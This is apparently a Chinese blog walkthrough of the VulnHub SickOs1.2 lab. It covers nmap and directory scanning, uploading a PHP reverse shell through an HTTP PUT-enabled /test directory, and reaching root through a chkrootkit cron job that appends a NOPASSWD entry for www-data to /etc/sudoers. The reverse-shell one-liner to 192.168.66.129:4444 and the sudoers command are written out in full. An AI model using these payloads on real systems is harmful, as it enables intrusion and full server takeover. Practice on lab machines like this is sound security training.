当前位置：首页 > article >正文

vulnhub靶场渗透之SickOs1.2渗透教程，计划任务提权、chkrootkit提权

article 2025/3/10 2:58:29

vulnhub靶场渗透之SickOs1.2渗透教程，计划任务提权、chkrootkit提权

一、信息收集

1、首先拿到靶场先扫一下ip

2025.3.7 AM 8：36

arp-scan -l
扫描同网段
nmap -sP 192.168.66.24/0

2、指纹扫描

nmap -sS -sV 192.168.66.130
指纹扫描

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    lighttpd 1.4.28

这里很多扫描方式，下面这种更详细一点。

nmap -p- -sV -A 192.168.66.130

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: lighttpd/1.4.28

这里一个22端口估计可以连接，一个80端口让我们去收集一下信息

3、扫描目录

dirb 192.168.66.130 dirsearch -u http://192.168.66.130/ -e * -i 200 我们先放后台扫描这，先去看看80端口

4、访问80端口

这里有张图片，翻译了一下更多像是什么启发但是这个网页源代码好像也没有什么东西，我们回到目录扫描找找线索

这里也是指纹扫描了一下，这个lighttpd1.4.28的web服务器像是一个突破点，找找看有没有exp之类的，但是我们要想办法建立一个隧道。

好在我们扫到了一个test的文档，但是这里的文件很奇怪

访问了一个文件，更像是提示

nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.66.130
查询网页支持的访问方式，这里是看了其他师傅的文章学到的

这里可以上传文件

5、寻找exp

searchsploit lighttpd

貌似是没有，这里思路有点断了，还是应该在网页哪儿做文章，或者看看这个东西有没有说法OpenSSH 5.9p1

这里有可以使用的，但是这种一般是建立好隧道才可以使用

6、建立隧道

这里支持PUT哪我们就可以上传一个反弹shell，然后本机开监听，这样也可以建立一个隧道

vi shell.php
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.66.129/4444 0>&1'");?>
这里是将上面代码写入一个php文件中，这里的ip是本机的ip，让靶机连接我们

curl -v -T shell.php -H 'Expect:' "http://192.168.66.130/test/"
这里就是以put方式将shell.php上传到靶机网站

记得上传时候开一个nc监听即可

这里已经上传成功了我们的shell.php，开一个监听然后在网页上点击就能连接上了，然后修复一下这个shell

python -c 'import pty;pty.spawn("/bin/bash")'

修复shell

这样我们的shell就是一个完整的了，剩下的就是我们开始信息收集

7、寻找exp

查看了一下版本内核

ls -l /etc/cron*
查看一下定时任务

查找具有 Setuid 权限的文件
find / -perm -u=s -type f 2>/dev/null

监听端口和进程信息
netstat -lntp

查看计划任务

cat /etc/crontab

-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit 这里chkrootkit是一个工具，看了其他师傅的文章才知道的那我们就找相关exp

8、提权

这里有个txt，先尝试尝试，这个exp就是说我们在tmp中以非root用户创建一个update文件，然后这个文件会以chkrootkit（uid=0）的身份来运行，我们将update中的命令追加到sudoers文件中，允许www-data用户无需密码执行任何sudo命令。这时我们就能直接使用root权限而不需要密码

echo "echo 'www-data ALL=NOPASSWD: ALL' >> /etc/sudoers">1
这条代码就是将www-date（普通身份用户）创建一个root

2025.3.7 AM 10：32 总结：这个靶机感觉就是拓展知识面，然后更熟练打靶流程和手感吧。然后就是提权命令，又多了一种提权方式吧。就是sudoers文件下可以操作的一些操作和套路，ok今天第一台靶机也是完成了，这个算是比较简单的了。也是从8点打到了10：30，还可以。接下来就去赶下一台靶机了

后续我也会出更多打靶文章，希望大家关注！谢谢。

查看全文

http://www.kler.cn/a/578000.html